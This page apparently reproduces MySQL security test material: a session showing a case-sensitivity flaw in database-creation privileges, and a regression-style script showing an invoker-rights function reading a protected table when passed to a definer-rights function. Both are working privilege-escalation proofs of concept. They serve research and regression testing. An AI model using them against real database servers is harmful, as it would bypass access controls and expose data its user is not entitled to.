Test method:
Warning: the following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk.
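1. Create a database
In the session below, the account `sample` is refused when it tries to create a database named `another`, yet the same statement succeeds for `SAmple`, a name that differs from the database it connected to (`sample`) only in letter case.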
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard
mysql> CREATE database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'
mysql> CREATE DATABASE SAmple;
Query OK, 1 row affected (0.00 sec)
2. Privilege escalation
# Regression-style script in mysqltest format: lines starting with `--` are
# harness directives, lines starting with `#` are comments.
# It checks in which security context the arguments of a stored function are
# evaluated when an invoker-rights function (f_evil) is passed as an argument
# to a function that runs with its definer's rights (f_suid).
# Reading it as a defender: after the setup, malory@localhost holds privileges
# on mysqltest1.* and EXECUTE on f_suid only, so every attempt by that account
# to read mysqltest2.t1 should end in the access-denied error.
# NOTE(review): identifier capitalisation varies on this page (Mysqltest1 /
# mysqltest1, F_suid / f_suid, Malory / malory), presumably an artefact of
# republishing; confirm against the original test file.
--disable_warnings
Drop database if exists mysqltest1;
Drop database if exists mysqltest2;
Drop function if exists f_suid;
--enable_warnings
# Prepare playground: two databases and an account that is granted rights on
# the first one only
Create Database Mysqltest1;
Create Database Mysqltest2;
Create user malory@localhost;
Grant all privileges on mysqltest1.* to malory@localhost;
# Create harmless (but suid!) function: no SQL SECURITY clause is given, so it
# runs with the rights of the account that defines it (MySQL's default is
# DEFINER)
# NOTE(review): the grant below names test.f_suid, so the function is
# presumably created in the harness's default schema `test`; confirm
Create function F_suid (i int) returns int return 0;
Grant execute on function test.f_suid to Malory@localhost;
Use Mysqltest2;
# Create a table in which malory@localhost would be interested but to which
# he won't have any access
CREATE TABLE t1 (i int);
# Open a second session as malory with mysqltest1 as its default database
Connect (Malcon, localhost, malory,,mysqltest1);
# Correct: malory@localhost doesn't have access to mysqltest2.t1, so the
# direct SELECT is expected to fail with the table-access-denied error
--error Er_tableaccess_denied_error
SELECT * from Mysqltest2.t1;
# Create the function that exposes the security hole. It is declared
# SQL SECURITY INVOKER, i.e. it should run with its caller's rights. It stores
# current_user() in @a and the row count of the protected table in @b, so the
# security context it actually ran in can be inspected afterwards.
delimiter |;
Create function F_evil ()
returns int
SQL Security Invoker
Begin
Set @a:= current_user ();
Set @b:= (SELECT COUNT (*) from MYSQLTEST2.T1);
return 0;
end|
delimiter; |
# Again correct: called directly, f_evil() runs with malory's rights and the
# read of mysqltest2.t1 is denied
--error Er_tableaccess_denied_error
Select F_evil ();
# @a and @b show which account the function body ran as and whether the
# protected table was read
Select @a, @b;
# OOPS!!! It seems that f_evil() is executed in the context of f_suid()'s
# definer, so malory@localhost gets all the info he wants.
# NOTE(review): this is the pre-fix expectation. On a corrected server this
# call should presumably be rejected like the direct call above (the same
# --error directive would precede it) and @b should not receive the row count;
# confirm against the fixed test.
Select Test.f_suid (F_evil ());
Select @a, @b;
# Cleanup: switch back to the default connection, then remove the test
# account and both databases.
# NOTE(review): f_suid itself is not dropped here; only the
# `Drop function if exists` at the top of the script removes it on a rerun.
Connection default;
Drop user malory@localhost;
Drop database Mysqltest1;
Drop database Mysqltest2;